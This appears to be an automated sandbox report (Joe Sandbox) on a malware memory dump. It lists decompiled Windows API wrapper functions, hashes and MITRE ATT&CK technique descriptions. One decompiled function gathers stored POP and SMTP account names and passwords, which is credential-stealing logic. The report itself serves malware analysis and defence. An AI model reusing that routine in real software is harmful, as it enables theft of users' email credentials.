Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction ID: b1d3f25f69c2166d3d07fcddbc0993e3b6974a4a806b5379996ceb22213e89af
Opcode Fuzzy Hash: 878e79dc60d56a32ccce77cf818dc40cd176942d244c38d6301a2c771aeba921
Instruction Fuzzy Hash: 5BC012311802087FFF012EC1CC02F483E1AAB08B55F044011BA18280E1EAB3A2205658

Uniqueness

Uniqueness Score: -1.00%

Function 00403C40 Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403C40(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xfbce7a42, 0, 0);
				_t4 = FindCloseChangeNotification(_a4); // executed
				return _t4;
			}

0x00403c4d
0x00403c55
0x00403c58

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,FBCE7A42,00000000,00000000,?,00404344,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00403C55

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction ID: f60e35b61e15034c3e7e350ceef27d37971f1a6745175d5827dd76012fe363c0
Opcode Fuzzy Hash: 67fd61e36e72385b159b193fd7e1560e83aa445b7d913ea69a34d34039b65f78
Instruction Fuzzy Hash: 70B092B01182087EAE006AF29C05C3B3E4ECA4060874094267C08E5451F937DF2014B4

Uniqueness

Uniqueness Score: -1.00%

Function 00403C08 Relevance: 1.5, APIs: 1, Instructions: 12
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403C08(WCHAR* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xdeaa357b, 0, 0);
				_t4 = DeleteFileW(_a4); // executed
				return _t4;
			}

0x00403c15
0x00403c1d
0x00403c20

APIs

DeleteFileW.KERNELBASE(?,00000000,DEAA357B,00000000,00000000), ref: 00403C1D

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction ID: 5639c68ad781144a2d68ff400f656d3d2c658e81fc8059c2e96e04b5885f7932
Opcode Fuzzy Hash: 01b23650ea3b3ad0b7ef3e64b7b20365c040140a899dd4cba48e3dfa7394e9f1
Instruction Fuzzy Hash: EDB092B04082093EAA013EF59C05C3B3E4DDA4010870048257D08E6111EA36DF1010A8

Uniqueness

Uniqueness Score: -1.00%

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402C1F(WCHAR* _a4) {
				struct HINSTANCE__* _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xe811e8d4, 0, 0);
				_t4 = LoadLibraryW(_a4); // executed
				return _t4;
			}

0x00402c2c
0x00402c34
0x00402c37

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: af34b662912c89fdb3a0f1b9ff73cd040c3e05ef601eeab43baa4f39a88cbda5
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Uniqueness

Uniqueness Score: -1.00%

Function 00403BEF Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403BEF(void* _a4) {
				int _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xda6ae59a, 0, 0);
				_t4 = FindClose(_a4); // executed
				return _t4;
			}

0x00403bfc
0x00403c04
0x00403c07

APIs

FindClose.KERNELBASE(00403F8D,00000000,DA6AE59A,00000000,00000000,?,00403F8D,00000000), ref: 00403C04

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction ID: 1ebc74916e7009c76bd4f38d62a0f1d2d6d24e136e2668fcc01a71b48f24aa02
Opcode Fuzzy Hash: 9873c53fda05388afb850746851f5e32e8254642b63e91831ef49aacf0f87411
Instruction Fuzzy Hash: FDB092B00442087EEE002EF1AC05C7B3F4EDA4410970044257E0CE5012E937DF1010B4

Uniqueness

Uniqueness Score: -1.00%

Function 00403BB7 Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403BB7(WCHAR* _a4) {
				long _t4;
				void* _t5;

				E004031E5(_t5, 0, 0xc6808176, 0, 0);
				_t4 = GetFileAttributesW(_a4); // executed
				return _t4;
			}

0x00403bc4
0x00403bcc
0x00403bcf

APIs

GetFileAttributesW.KERNELBASE(00413D1F,00000000,C6808176,00000000,00000000,?,00403D58,00413D1F,?,00403C6D,00413D1F,?,00413D1F,00000000), ref: 00403BCC

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction ID: 12c622a32f4ce0ce5baf48af10e49973588d22e73ecb696d4958cc4f11b8a016
Opcode Fuzzy Hash: 1d6dd25f7c332fd1d35fbf5985813ee51de81cf8f6e5d0f963c2f0c9ec148b39
Instruction Fuzzy Hash: D2B092B05042083EAE012EF19C05C7B3A6DCA40148B4088297C18E5111ED36DE5050A4

Uniqueness

Uniqueness Score: -1.00%

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004049FF(void* _a4) {
				long _t3;
				void* _t4;

				E004031E5(_t4, 9, 0xd980e875, 0, 0);
				_t3 = RegCloseKey(_a4); // executed
				return _t3;
			}

0x00404a0d
0x00404a15
0x00404a18

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: a61027cf4d9072e61279d4b4f16a9571f3d05446971c54f2b184413104fd85b7
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Uniqueness

Uniqueness Score: -1.00%

Function 00403B64 Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403B64(WCHAR* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
				_t3 = PathFileExistsW(_a4); // executed
				return _t3;
			}

0x00403b72
0x00403b7a
0x00403b7d

APIs

PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199

Uniqueness

Uniqueness Score: -1.00%

Function 00404DE5 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

closesocket.WS2_32(00404EB0), ref: 00404DEB

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8

Uniqueness

Uniqueness Score: -1.00%

Function 00403F9E Relevance: 1.3, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403F9E(void* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
				return _t3;
			}

0x00403fac
0x00403fba
0x00403fbe

APIs

VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8

Uniqueness

Uniqueness Score: -1.00%

Function 00406472 Relevance: 1.3, APIs: 1, Instructions: 12
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406472(long _a4) {
				void* _t3;
				void* _t4;

				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
				Sleep(_a4); // executed
				return _t3;
			}

0x0040647f
0x00406487
0x0040648a

APIs

Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9

Uniqueness

Uniqueness Score: -1.00%

Function 004058EA Relevance: 1.3, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004058EA(char* _a4, char* _a8) {
				char* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
				_t4 = StrStrA(_a4, _a8); // executed
				return _t4;
			}

0x004058f8
0x00405903
0x00405906

APIs

StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559

Uniqueness

Uniqueness Score: -1.00%

Function 00405924 Relevance: 1.3, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405924(WCHAR* _a4, WCHAR* _a8) {
				WCHAR* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
				_t4 = StrStrW(_a4, _a8); // executed
				return _t4;
			}

0x00405932
0x0040593d
0x00405940

APIs

StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t71;
				void* _t75;
				void* _t77;

				_t72 = _a4;
				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
				_t81 = _t71;
				if(_t71 != 0) {
					_push(__ebx);
					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
					_v8 = _v8 & 0x00000000;
					_v20 = _t40;
					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
					_v12 = _v12 & 0x00000000;
					_v32 = _t45;
					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
					_t77 = _t75 + 0x50;
					_v36 = _t47;
					if(_v8 != 0 || _v12 != 0) {
						E00405872( *0x49f934, _t71, 1, 0);
						E00405872( *0x49f934, _t67, 1, 0);
						_t74 = _v16;
						E00405872( *0x49f934, _v16, 1, 0);
						E00405781( *0x49f934, _v40);
						E00405872( *0x49f934, _v20, 1, 0);
						_push(_v8);
						E00405762(_v16,  *0x49f934, _v24);
						E00405872( *0x49f934, _v28, 1, 0);
						E00405781( *0x49f934, _v44);
						E00405872( *0x49f934, _v32, 1, 0);
						_push(_v12);
						E00405762(_t74,  *0x49f934, _v36);
						_t77 = _t77 + 0x88;
					} else {
						_t74 = _v16;
					}
					E0040471C(_t71);
					E0040471C(_t67);
					E0040471C(_t74);
					E0040471C(_v20);
					E0040471C(_v24);
					E0040471C(_v28);
					E0040471C(_v32);
					E0040471C(_v36);
				}
				return 1;
			}

0x0040d070
0x0040d080
0x0040d084
0x0040d086
0x0040d08c
0x0040d0a0
0x0040d0ae
0x0040d0bd
0x0040d0c0
0x0040d0c5
0x0040d0c9
0x0040d0e3
0x0040d0f2
0x0040d101
0x0040d104
0x0040d109
0x0040d110
0x0040d11e
0x0040d123
0x0040d126
0x0040d12d
0x0040d145
0x0040d154
0x0040d15a
0x0040d166
0x0040d174
0x0040d186
0x0040d18e
0x0040d19a
0x0040d1ac
0x0040d1ba
0x0040d1cc
0x0040d1d1
0x0040d1dd
0x0040d1e2
0x0040d1e7
0x0040d1e7
0x0040d1e7
0x0040d1eb
0x0040d1f1
0x0040d1f7
0x0040d1ff
0x0040d207
0x0040d20f
0x0040d217
0x0040d21f
0x0040d227
0x0040d230

Strings

SmtpPort, xrefs: 0040D0EB
PopPort, xrefs: 0040D0A7
PopAccount, xrefs: 0040D0B6
SmtpAccount, xrefs: 0040D0FA
Technology, xrefs: 0040D08D
PopPassword, xrefs: 0040D0D0
SmtpServer, xrefs: 0040D0DC
SmtpPassword, xrefs: 0040D117
EmailAddress, xrefs: 0040D074
PopServer, xrefs: 0040D099

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Uniqueness

Uniqueness Score: -1.00%

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000003.00000002.510096240.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.510211160.00000000004A0000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_wcycejenv.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

